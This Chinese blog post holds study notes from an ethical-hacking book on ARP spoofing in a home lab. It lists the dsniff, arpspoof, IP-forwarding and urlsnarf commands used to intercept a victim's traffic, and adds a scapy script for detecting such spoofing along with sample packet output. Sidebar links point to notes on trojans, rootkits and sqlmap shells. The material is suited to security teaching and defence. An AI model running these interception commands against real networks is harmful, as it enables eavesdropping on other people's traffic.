Ethical.Hacking.2021.10:Performing an ARP Spoofing Attack

最新推荐文章于 2024-09-28 16:16:16 发布
最新推荐文章于 2024-09-28 16:16:16 发布
阅读量1.6k 收藏
点赞数
分类专栏: 读原著笔记 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/121752480
版权

Start by running sudo -i  to become a root user.

升级一下包管理器:apt-get update

安装:apt-get install dsniff

The dsniff  tool contains several useful tools for intercepting network traffic, such as arpspoof
, a tool that executes an ARP spoofing attack.

netdiscover

It issues ARP queries for all possible IP addresses on the subnetwork, and when a machine on the network responds, it records and displays the machine’s MAC address and IP address.

netdiscovery -r 10.10.10.0/24

一旦找到,CTRL+C中断

接下来,让Kali能够转发包

enable IP forwarding by setting the IP forwarding flag:

echo 1 > /proc/sys/net/ipv4/ip_forward

 generate multiple fake ARP replies by running the following command:

arpspoof -i eth0 -t <VICTIM_IP>  <ROUTER_IP>

 -t  flag specifies the target

 -i  flag represents the interface.

0806 is a type field indicating that an ARP packet is contained within the Ethernet frame being transmitted.

42  represents the total number of bytes associated with the Ethernet frame.

also trick the router into believing you’re the victim so that you can intercept incoming internet traffic on the victim’s behalf.

arpspoof -i eth0 -t <ROUTER_IP> <VICTIM_IP>

Extract the URLs by running the following command in a new terminal:(截取eth0的URL包)

kali@kali:~$ sudo urlsnarf -i eth0

检测ARP欺骗攻击:(先安装包)

sudo apt install python3-pip

pip3 install --pre scapy[basic]

后台运行mousepad:mousepad &

from scapy.all import sniff

IP_MAC_MAP = {}


def processPacket(packet):
    src_IP = packet['ARP'].psrc
    src_MAC = packet['Ether'].src
    if src_MAC in IP_MAC_MAP.keys():
        if IP_MAC_MAP[src_MAC] != src_IP:
            try:
                old_IP = IP_MAC_MAP[src_MAC]
            except:
                old_IP = "unknown"
            message = str(old_IP) + "is pretending to " + str(src_IP)
            return message
    else:
        IP_MAC_MAP[src_MAC] = src_IP


sniff(count=0, filter="arp", store=0, prn=processPacket)

我的探索代码,启动监听ARP协议包

from scapy.all import *

def handelPacket(p):
    # src_IP = p['ARP'].psrc
    # src_MAC = p['Ethernet'].src
    # message=str(src_IP)+"  : "+str(src_MAC)
    # return message
    p.show()


sniff(prn=handelPacket, filter="arp", count=0)

linux开启arp伪造攻击:

sudo arpspoof -i eth0 -t 10.10.10.5 10.10.10.1

结果:

###[ Ethernet ]### 
  dst       = 08:00:27:49:84:59
  src       = 08:00:27:a6:1f:86
  type      = ARP
###[ ARP ]### 
     hwtype    = 0x1
     ptype     = IPv4
     hwlen     = 6
     plen      = 4
     op        = who-has
     hwsrc     = 08:00:27:a6:1f:86
     psrc      = 10.10.10.7
     hwdst     = 00:00:00:00:00:00
     pdst      = 10.10.10.3

###[ Ethernet ]### 
  dst       = 08:00:27:a6:1f:86
  src       = 08:00:27:49:84:59
  type      = ARP
###[ ARP ]### 
     hwtype    = 0x1
     ptype     = IPv4
     hwlen     = 6
     plen      = 4
     op        = is-at
     hwsrc     = 08:00:27:49:84:59
     psrc      = 10.10.10.3
     hwdst     = 08:00:27:a6:1f:86
     pdst      = 10.10.10.7
###[ Padding ]### 
        load      = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
 

花纵酒
关注
专栏目录
Ethical-Hacking-Basics-kali-2021:Udemy课程内容
04-02
道德操守基本知识2021年 Udemy课程内容-Ethical-Hacking-Basics-kali-2021我将托管我在课程中使用的脚本和其他内容。
MGH.Gray.Hat.Hacking.The.Ethical.Hackers.Handbook.5th.Edition.1260108414.epub
05-21
书评:The Gray Hat Hacking book series continue to provide an up-to-date and detailed view on a large variety of offensive IT security disciplines. In this fifth edition, a group of respected infosec ...
Ethical.Hacking.2021.10:SCANNING TARGETS
lm19770429的专栏
12-14 2975
For example, the National Telecommunicationsand Information Administration (NTIA) requires all .us domains topublish their contact information. kali@kali:~$ whois zoom.us Maltego Maltego allows hackers and security researchers to discover connection...
Ethical.Hacking.2021.10:STEALING AND CRACKING PASSWORDS
lm19770429的专栏
12-20 438
Understanding HTTP Requests Using SQLMap 与书中不一致,--sqlmap-shell已经不用了,改为--shell了,如下: sudo sqlmap -u "http://192.168.1.102/mutillidae/index.php?page=user-info.php&username=&password=&" --shell 注意-u 后面的url要用“”括起来 ...
Ethical.Hacking.2021.10:BUILDING TROJANS
lm19770429的专栏
12-24 2170
回顾: metasploitframe 反射过程 msfvenom生成代码命令 Hiding an Implant in a Legitimate File
Ethical.Hacking.2021.10:Virtual Lab Setup
lm19770429的专栏
12-06 1341
网络拓扑结构 Setting Up pf Sense https://www.pfsense.org/download/ Choose the AMD64(64-bit) architecture, the DVD image (ISO) installer
Ethical.Hacking.2021.10:ANALYZING CAPTURED TRAFFIC
lm19770429的专栏
12-07 233
Wireshark and TCPDump
Ethical.Hacking.2021.10:PHISHING AND DEEPFAKES
lm19770429的专栏
12-09 2468
Performing a DNS Lookup of a Mail Server exam:dig mx gmail.com an SMTP server that accepts a connection on port 25. Use netcat on the Kali Linux virtual machine to connect to port 25 on that IP address by running the following command:
Ethical.Hacking.2021.10:BUILDING TROJANS(2)
lm19770429的专栏
12-26 3036
Creating a Windows Trojan We’ll cover two methodsof hiding your implant: in a fun, open source implementation of the game Minesweeperby Humaeed Ahmed, and in a document using the Social Engineering Toolkit (more onthis in a moment). I’ve forked Ahme...
Ethical.Hacking.2021.10:BUILDING AND INSTALLING LINUX ROOTKITS
lm19770429的专栏
12-26 380
备份Kali 写kernel module code That’s because the Linux kernel is written in C, so kernel modules must also be written in C. Secondly, we won’t be able to use the standard C libraries (such as unistd, stdio, and stdlib), because user space libraries are not.
Ethical.Hacking.2021.10:FUZZING FOR ZERO-DAY VULNERABILITIES
lm19770429的专栏
12-14 349
This type of attack is called a buffer over-read, as we can read beyond the bounds of the designated memory buffer. Similarly, in a buffer overflow attack, a hacker uses a bug to write beyond the bounds of a designated buffer. Hackers often use buffer o...
Gray.Hat.Hacking.The.Ethical.Hackers.Handbook.4th.Edition
06-26
Completely updated and featuring 12 new chapters, Gray Hat Hacking: The Ethical Hacker's Handbook, Fourth Edition explains the enemy’s current weapons, skills, and tactics and offers field-tested ...
McGraw.Hill.Gray.Hat.Hacking.The.Ethical.Hackers.Handbook.3rd.Edition.Jan.2011
09-14
McGraw.Hill.Gray.Hat.Hacking.The.Ethical.Hackers.Handbook.3rd.Edition.Jan.2011 pdf http://www.amazon.com/Gray-Hacking-Ethical-Hackers-Handbook/dp/0071742557/ref=sr_1_9?ie=UTF8&qid=1315966016&sr=8-9
Arp-Spoofer:纯Python ARP缓存中毒(又名“ ARP欺骗”)工具
03-19
Python 3 ARP欺骗工具 纯Python ARP缓存中毒(又名“ ARP欺骗”)工具,利用以太网II帧和ARP数据包的低级组合。 此应用程序不依赖第三方模块,可以由任何Python 3.x解释器运行。 安装 只需使用git clone克隆此存储库...
Arch - 架构安全性_保密(Confidentiality)
小工匠
09-28 968
保密机制需根据实际应用需求设计,确保敏感数据在各个环节的安全,特别是在客户端和服务端之间传输时。
一体化运维监控管理平台的全面监控能力
MXsoft618的博客
09-23 510
一个优秀的监控平台不仅要能够全面覆盖各类IT和智能设备,还需具备灵活性和可扩展性,以适应不断变化的监控需求。此外,对于虚拟化技术,如Vmware、Harper、vSphere以及国内的华为云、曙光云等,平台也能实现有效的监控和管理。一体化运维监控管理平台以其全面的监控能力、广泛的设备支持和灵活的监控方式为企业提供了强大的运维支持。这种广泛的支持范围使得平台能够适应更多样化的系统环境,满足企业不同的监控需求。运维团队可以根据实际需求,通过平台提供的接口自定义监控模式,从而实现对这些特定设备和系统的全面监控。
基于asp.net的工作流程审批系统设计与实现.docx
09-30
基于asp.net的工作流程审批系统设计与实现.docx
这是各种对象检测数据集的预处理相关工具脚本的集合.zip
最新发布
09-30
这是各种对象检测数据集的预处理相关工具脚本的集合
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值